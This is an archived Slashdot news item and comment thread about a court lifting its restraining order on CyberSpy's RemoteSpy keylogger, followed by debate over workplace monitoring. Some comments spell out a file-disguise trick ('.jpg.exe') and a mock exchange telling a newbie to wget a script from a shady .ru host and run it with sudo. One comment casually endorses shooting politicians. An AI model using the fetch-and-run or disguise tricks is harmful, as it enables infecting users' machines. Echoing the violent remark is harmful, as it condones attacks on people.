Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
Security Government Privacy Software United States News Your Rights Online

Restraining Order On Commercial Spyware Lifted 97

Posted by Soulskill
from the sketchy-enough-for-government-work dept.
Back in 2008, the US Federal Trade Commission filed a restraining order against CyberSpy Software, makers of a commercial spyware program that logged keystrokes, took screenshots, monitored IM conversations, and sent all the collected data back to the company's servers. Reader suraj.sun tips news that the order has now been lifted, allowing CyberSpy to sell its software, but with a few restrictions. "According to the US District Court settlement, the company must not provide users with the means to disguise the software as an innocent file or email attachment. Users must also be advised that doing so may violate US state or federal law. Additionally, all recorded information sent over the Internet must be encrypted and older legacy versions of the software must be removed from computers on which it was previously installed. ... RemoteSpy is said to employ rootkit techniques to hide from virus scanners."
This discussion has been archived. No new comments can be posted.

Restraining Order On Commercial Spyware Lifted

Comments Filter:
  • Easy fix... (Score:5, Informative)

    by gringer (252588) on Sunday June 06, 2010 @08:43AM (#32474954)

    The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment.

    I'll do it for them:

    1. rename 'malicious_software.exe' 'unicorns_with_flowers.jpg.exe'
    2. attach to email

    • The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment.

      I'll do it for them: 1. rename 'malicious_software.exe' 'unicorns_with_flowers.jpg.exe' 2. attach to email

      Even easier fix .... use something other than Windows/Mac OS for your operating system.

      • Re: (Score:2, Insightful)

        by selven (1556643)

        No OS can possibly be secure against user security without giving the user no freedom (see: iPad).

        Here's the similar exploit for Linux:

        Linux newbie: How do I get $obscure_proprietary_hardware working on my system?
        Evil black hat hacker: The following did it for me:

        wget -O run.sh www.shady_website.ru/linux/puppies_and_unicorns/3a64bc92.txt
        chmod +x run.sh
        sudo ./run.sh

        Linux newbie: Ok, thanks, I'll try that. I don't know what any of that means but it sure is nice to have people as advanced as you helping me!

        • by hairyfeet (841228)

          Or you could just go to this handy site that explains how to write a Linux virus [geekzone.co.nz] in 5 easy steps (virus, trojan, worm, whatever, its a bug) and if you need a way to deploy it here is a PDF [arizona.edu] from researchers telling how they believe they can take over a repo without needing the private key. The simple fact is NOTHING is secure, short of using the "cut all the lines and bury it in a safe" method, which is why the military uses air gaps on important machines.

          As for TFA, they'll probably have folks lined up to

    • by cappp (1822388)
      To be fair the FTC required a fair bit more than the summary is stating.

      ...requires that the software provide notice that the program has been downloaded and obtain consent from computer owners before the software can be installed.
      According to papers filed with the court, the defendants provided their clients with detailed instructions explaining how to disguise the spyware as an innocuous file, such as a photo, attached to an e-mail...
      The final Order bars the defendants from providing purchasers with the

  • Do the authorities care so little for the average citizen?

    If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?
    • Re:So Little (Score:5, Interesting)

      by couchslug (175151) on Sunday June 06, 2010 @08:57AM (#32475036)

      "Do the authorities care so little for the average citizen?"

      Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

      • Re: (Score:3, Insightful)

        by digitalhermit (113459)

        This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again.

        If only it were so simple. It's relatively easy to pass a law. It's a lot more difficult to repeal them.

        • by selven (1556643)

          Removing one law is difficult, but removing lots of laws is not that much more difficult. All you need is for a few dozen thousand people to get really angry and each try to put a bullet in the head of a politician. That's the "purge" part of the cycle, and some form of sudden violent collapse is the only way that in the real world political complexity ever actually goes down.

      • Re:So Little (Score:5, Insightful)

        by DaMattster (977781) on Sunday June 06, 2010 @10:16AM (#32475532)

        "Do the authorities care so little for the average citizen?"

        Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

        Of course, don't you know government and industry are mostly in sleeping together? Why do you think BP got away with murder up until the point thhings quite literally exploded.

    • duh (Score:3, Insightful)

      by KwKSilver (857599)

      Do the authorities care so little for the average citizen? If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

      The authorities "care" for the average citizen is roughly 0.000. Who says the don't allow scams, embezzlement and Ponzi schemes. Isn't all that what blew up the economy a couple of years ago?

      • Re: (Score:1, Insightful)

        by Anonymous Coward

        I think it is more because they don't like competition. Scams (Pork barrel projects) Ponzi (Social Security), Embezzlement (self voted raises).

    • Re:So Little (Score:4, Insightful)

      by arth1 (260657) on Sunday June 06, 2010 @09:23AM (#32475164) Homepage Journal

      Clearly, this is done "for the sake of" protecting children, "for the sake of" protecting us against terrorism, and "for the sake of" protecting our companies from industrial espionage.

      When someone wearing a suit says "for the sake of", he or she means "in the name of".
      Remember that the next time you vote.

      • by Cryacin (657549)

        Remember that the next time you vote.

        So am I voting for Pepsi, or Coke?!?

        • by arth1 (260657)

          So am I voting for Pepsi, or Coke?!?

          Yes, that's about the freedom you have right now.

          If you'd rather want the choice of lemonade, you have only a few choices, including expatriation and sedition. Attempts at changing the system from within is futile, and will only lead to Minute Maid(R)(TM) with 3% lemon juice.

    • Re: (Score:3, Insightful)

      Well, yes, they do, but this is not an example of that. If I own a small company I can install whatever I want on my systems to monitor what my employees are doing for various reasons. I know of one specific case where a property management company does this to ensure that a disgruntled employee doesn't improperly handle a tenant's personal information - it is there for CYA reasons. I would also imagine that some parents would want to monitor their kids. I can see a lot of legitimate uses for this, and

    • If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

      Since they run the largest Ponzi scheme in US History, I suspect that they're only down on them because they don't like competition.

    • Re: (Score:1, Insightful)

      by Anonymous Coward

      Do the authorities care so little for the average citizen?

      Absolutely. The bureaucrats in Washington typically do little or nothing until the situation gets so bad that it threatens re-election opportunities; e.g., the 9-11, financial collapse, the BP environmental disaster. Once a situation reaches this level, they'll stand in front of every camera possible to declare something must be done in order to save face. Without this incentive, they're more than happy to sit on the lap of the corporate-backed lobbyists.

      Of course, it doesn't say much about the American peo

  • I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!
    • by AHuxley (892839)
      http://en.wikipedia.org/wiki/Magic_Lantern_(software) [wikipedia.org]
      Best to keep computer land flooded with low grade consumer OS and issues.
      Just another warning, click and its gone.
      What would the feds do if more users had Unix like backends with gui pop ups about changes to vital system areas?
    • by Weezul (52464)

      No, just another evil corporation that isn't actually chopping up kittens and has powerful lobbyists. Yeah, amybe those lobbyists are partially police agencies, but surely the NSA/CIA don't need these guys.

    • I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!

      Switch to the most secure operating system in the world, OpenBSD. No tinfoil needed.

    • Tinfoil hats actually amplify government mind control rays [mit.edu]! Putting on tinfoil hats is exactly what they want you to do! ;)
  • by masmullin (1479239) <masmullin@gmail.com> on Sunday June 06, 2010 @09:00AM (#32475046)

    I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

    • by Ornedan (1093745)

      I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

      • I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

        I guess it depends upon your purview and political orientation. An employer does have certain rights to protect its company image but only while implied employee is on company time. I've heard about stories about Coors employees being fired for drinking Bud while on their own time! This kind of spying is wrong!

    • by Sycraft-fu (314770) on Sunday June 06, 2010 @09:23AM (#32475160)

      Not saying I'd trust software like this, but I could see the potential in wanting to be able to monitor your own computers. Maybe you live with roommates and you don't trust them to leave your shit alone, etc.

      There are legit uses for having clandestine reporting software on a PC. Same deal as lock picks, firearms, and many other things with legal and illegal uses.

      Sounds like the problem with these guys is they were attempting to primarily market it for illegal use. That is what gets you in trouble. If something has legal and illegal uses, but you market it for legal uses and attempt to sell it only to legal users, then you are fine. If you market it for illegal purposes, then you get in trouble.

      That is why smoke shops are so big on what you say you are going to use their glassware for. It is perfectly legal to buy it for smoking tobacco. Bongs and such derive from Hookahs which were invented for the purpose of smoking tobacco. However, if you imply that you intend to use their products for smoking marijuana or other controlled substances, they'll refuse to sell to you. In this way they can make sure to stay clear legally. Though their products have illegal uses, they only market them for legal ones, and take care to attempt to not sell them for illegal purposes.

      • Re: (Score:1, Interesting)

        by Anonymous Coward

        That is why smoke shops are so big on what you say you are going to use their glassware for.

        As someone who sold smoking accessories at one time, I can attest to this. We flat told people that these were for tobacco use only and that if they made any reference to illegal use, we would not sell to them. Ironic, but about 3% of the people were too stupid (or stoned) to understand this, thus they didn't get to buy. Otherwise, I would have been guilty of selling "drug paraphernalia" and subject to a fine or

        • The only problem I have with marijuana is with regards to driver and work safety. It has an adverse effect on reaction time. Agencies such as NHTSA and OSHA would agree I'm sure.

          On the whole, marijuana's impact on the body is far less damaging (if at all) compared to alcohol. However, THC (active substance in marijuana) takes longer to metabolize than alcohol does. If you smoke habitually, it starts to effect serotonin levels until the user stops. It's now even more serious with newer breeds of plants. THC

        • How can we plausibly restrict the sale of malware if the seller can point to the smoke shops for comparison? Seems like they only have to wink and say "don't tell us you plan to do anything illegal with it".
    • It's their right to install this sw on the computers they own.

      California is a community property state. This means your wife owns half of your computer. Uh, oh. And even if you live in a spare bedroom at your mom's house, single and bad husband material at age 32, you may not want this software to email mom a jpeg of the download page from www.toilet-rated-pron.com She bought it for you, remember?

      • by NNKK (218503)

        Absent specific laws or agreements to the contrary, each owner in a jointly-owned property has the right to do anything they want with said property, with or without the consent of the other owner(s).

    • Re: (Score:3, Interesting)

      by arth1 (260657)

      I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

      Is it also their right to install cameras in toilet stalls they own?
      How about searching through cars in the parking lot they own?

      It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own

      • by drinkypoo (153816) <martin.espinoza@gmail.com> on Sunday June 06, 2010 @09:50AM (#32475338) Homepage Journal

        Is it also their right to install cameras in toilet stalls they own?
        How about searching through cars in the parking lot they own?

        Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

        It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

        • by arth1 (260657)

          If by "really this stupid", you mean "think beyond the initial gut reaction", I sure hope so.

          If the computer is only for company use, you have a case. If, however, the company allows the user any personal use of the computer, be it to read news during breaks, check personal e-mail, or listen to personal music, then it's not so clear-cut anymore. Then they do indeed provide computer resources "for your need" (your words) too, and monitoring that would logically be no different from monitoring other persona

          • by Imrik (148191)

            You do not "need" to use a computer for personal reasons at work. As long as the company is up front about the monitoring software on the computer it is your option whether you want to use it for personal reasons.

            • by arth1 (260657)

              You do not "need" to use their parking lot or their rest room either. By the same logic, it's OK for a company to install monitoring devices and perform searches there too, as long as they are "up front" about it.

              No, it's high time that employers are told what's permissible and what's not. Anything private should not be subject to searches, else we're already on that slippery slope.

              Today, it's OK if they log your web access and go through e-mails stored on your computer.
              Tomorrow, it's OK if they read thro

        • by eyore15 (1541595)

          Is it also their right to install cameras in toilet stalls they own? How about searching through cars in the parking lot they own?

          Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

          It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

          I've been under the impression that monitoring your personal habits is part of the Japanese method management. Too many potty breaks and you get a stern talking to

      • Re: (Score:3, Interesting)

        That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.
        • That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.

          If you were monitored while taking your daily constitution, and it somehow got back to you, you would have a hell of law suit against your employer.

          • You'll need to explain that in more detail. If my employer tells me that they can and might monitor my system and I go to youporn.com on the company computer while on my "daily constitution" and I get canned, how exactly would I have a hell of a lawsuit against my employer?
            • I hate to have to be the one to tell you this, but, "daily constitution" is a euphemism for a bowel movement. The GP wasn't talking about using the computers, he was talking about using the bathroom.

              • by TheLink (130905)
                Maybe he knew that already. In theory it's possible to use a computer while doing that. Just hope you don't inherit his "company issue laptop"...
        • The bathroom stall is the scene of much corporate espionage (you know, where you see the guy inserting or removing the capsule containing the microfilm, looking at it, then getting knocked on the head by a guy wearing the black ski mask), it is a legitimate surveillance target.. well, in Hollywood anyway

        • by arth1 (260657)

          as is making sure that the employee isn't spending all day playing Farmville

          Why, exactly?
          I can see that it's in the interest of the company to get as much work as at all possible out of an employee, but if one salaried employee works 8 hours and produces X amount of work, and the salaried employee in the next cubicle plays Farmville for 6 hours a day and STILL produces X amount of work, it's no loss. Both do their work. If a company wants them to work constantly, they should put them on wages, not salary.

      • It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own the company, not the other way around.)

        I think we never left those times. There are still FEW laws that protect the employee and MANY that protect the employer.

        • And, the legal situation is dynamic. Why do you think so many corporations are so happy to employ illegal aliens? It isn't just the up-front cost of employment. Millions of illegals also give the corporates the muscle to avoid increased wages, benefits, and rights of employees. If half of your employees are afraid to talk to a law enforcement officer for any reason, he certainly isn't going to rat on you for putting spycams in the restrooms! Any lesser violation of an employee's rights simply won't be

    • Hardly. Of course as an employee it would be safer not to use workplace machines for private affairs at all... but:

      It's perfectly reasonable a company should have control over how employees use the employer's equipment. But that should be limited to "work-time spent doing other things", "making sure company gear isn't used for illegal activity", "making sure company network isn't cluttered because company machines are (ab)used for P2P downloads", "blocking access to risky sites, or allowing access only t

    • Re: (Score:3, Interesting)

      by GillyGuthrie (1515855)

      The name of the software company ("CyberSpy") sure seems to imply that its marketing strategy is to appeal to the obsessive stalker who needs a convenient way to spy on another person and steal their passwords, read their email, etc. I personally knew a guy that was so obsessed with his ex that he tricked her into d/l a similar spy program with very similar functionality to CyberSpy and all he did was change the filename of the install package to something a little less obvious (unicorns_with_flowers.jpg.e

      • How about just firing them when they don't get their work done on time? Quite a bit easier than watching everything they do.
        • Because the gp is wrong. It's not about making sure the employees are using their time efficiently, it's about making sure that they aren't doing nefarious things like sharing trade secrets

      • by fuzzyfuzzyfungus (1223518) on Sunday June 06, 2010 @10:55AM (#32475814) Journal
        As does its feature set. In your standard corporate/institutional environment, you don't need stealthy install techniques, since IT already has mechanisms in place for rolling out whatever software is needed; and you don't need any sophisticated AV-dodging techniques, since AV is typically centrally managed, and IT can whitelist whatever they want.

        At best, this stuff is being used in interpersonally-touchy-but-legal ways(ugly roommate situations, spying on the kiddies, spousal paranoia, etc.), and I'm guessing that the sliminess of the customer base just increases from there.
      • by penix1 (722987)

        I agree that the most legitimate use of this software would be for employers to monitor their employees. An employer who owns the computers its employees are using has a right to install spyware without employee's knowledge... duh. They are handing out paychecks and if they don't want their employees farting around on Facebook all afternoon, it's their right to "spy" and verify that rules are not being broken.

        There are far more efficient ways than installing a rootkit on computers to "catch" employees. And

        • I don't agree that an employer has the right to spy on employees without their consent as a condition of using the computer.

          It IS their right... but you ARE allowed to disagree.

          If you are so worried that an employee is going to goof off, then maybe you don't have a clue how to manage your employees.

          I'M not a manager, I'm just a general-purpose technician. If a local business manager calls me and says he wants to limit Facebook access, I'm not going to advise him on his managerial skills. I am going to blacklist *.facebook.com on the local DNS server or use a DynDNS account with blacklisting/filtering and point the offender's NIC to that address. If he insists that he has made the decision that he wants spyware installed, guess what - I'll install

    • Re: (Score:3, Informative)

      They have this sort of thing in Taiwan, I was working for a company in South Africa that bought the license to sell it. Here it is: Ip-Guard [ip-guard.com] Basically, the software is scarily powerful in what it records and can do.

      In south african law it's legal only if the employee is aware of it, so if it's in the employment contract. I think.

      The company I was working for charged too much, didn't make enough sales, went tits-up. Classic case of greed before the fall.
    • I believe we do have a reasonable expectation of privacy. Kind of shame those that are greedy and in power forget what it is like when the shoe is on the other food.
    • Just examine that "hardware they own" argument a bit. Are you certain it's not just because you think employers can do anything they like to employees? Consider the cases where:

      - The employer leases or rents their hardware. No spying allowed?
      - The employee uses his own hardware. Can't demand he installs this?
      - Someone leases or rents hardware to a company. Can't spy on their customers?
      - Someone leases or rents hardware to individuals. Can't spy on them?
      - Some company owns mail servers / routers / wires. Ca
      • WTF are you talking about? Of course it's about whether the employer owns the hardware. You can't install stuff on employees private property.

        For the record using this software is pretty lame. If an employer wants to monitor employees just tell the employees they are being monitored and use a less obfuscated software system. However, if the employer owns the hardware they can do whatever the fuck they want with it.

        • by Imrik (148191)

          You can however require that the software be installed on any computer that uses the company network or even on any computer that's in the building.

          • So don't use private computers at work. Don't connect to the work VPN with private computers. You shouldn't be doing these things anyway.

            Employers cannot demand you to utilize private equipment for work tasks.

  • by assemblerex (1275164) on Sunday June 06, 2010 @09:31AM (#32475204)
    How do you market an oxymoron?
    • Dear CyberSpy software

      I need to spy my sysadmin, because he is suspected of spying on company's emails. That is why I am sending this email from my hotmail account instead of company's server. I want to purchase your RemoteSpy software.

      PS: you asked about his windows version. I just checked that, he is running windows version called "Slackware" I hope this helps.

      PSS: I have already paid on your secure website using my credit card,
      best regards

    • How do you market an oxymoron?

      Why...ask Bill Gates! I know, it's a cheap shot - 's/Bill Gates/Steve Jobs/g' if you wish.

  • ...as I imagine it will only be a matter of time before some inquisitive folks who are up to the challenge figure out how to detect (and possibly disable) this.

  • by Brett Johnson (649584) on Sunday June 06, 2010 @08:01PM (#32479568)

    Back in 2002 or 2003 I was offered a job with these guys [or possibly a similar firm] to port the software to Mac OS X. Once I was informed that the product I would be working on was to be used to spy on a company's employees, I chose to decline. When I started in my career almost 30 years ago, I vowed to myself that I would pursue it with the utmost integrity. This was way over *my* line.

  • Let me see if understand this correctly:

    Bush's FTC stopped this horrid piece of software from infecting a persons machine.

    Obama's FTC allows allows this spyware into the world.

    Can someone remind which party is for 'the little guy'.

    Wow am I glad we voted Obama in.

The IQ of the group is the lowest IQ of a member of the group divided by the number of people in the group.

Working...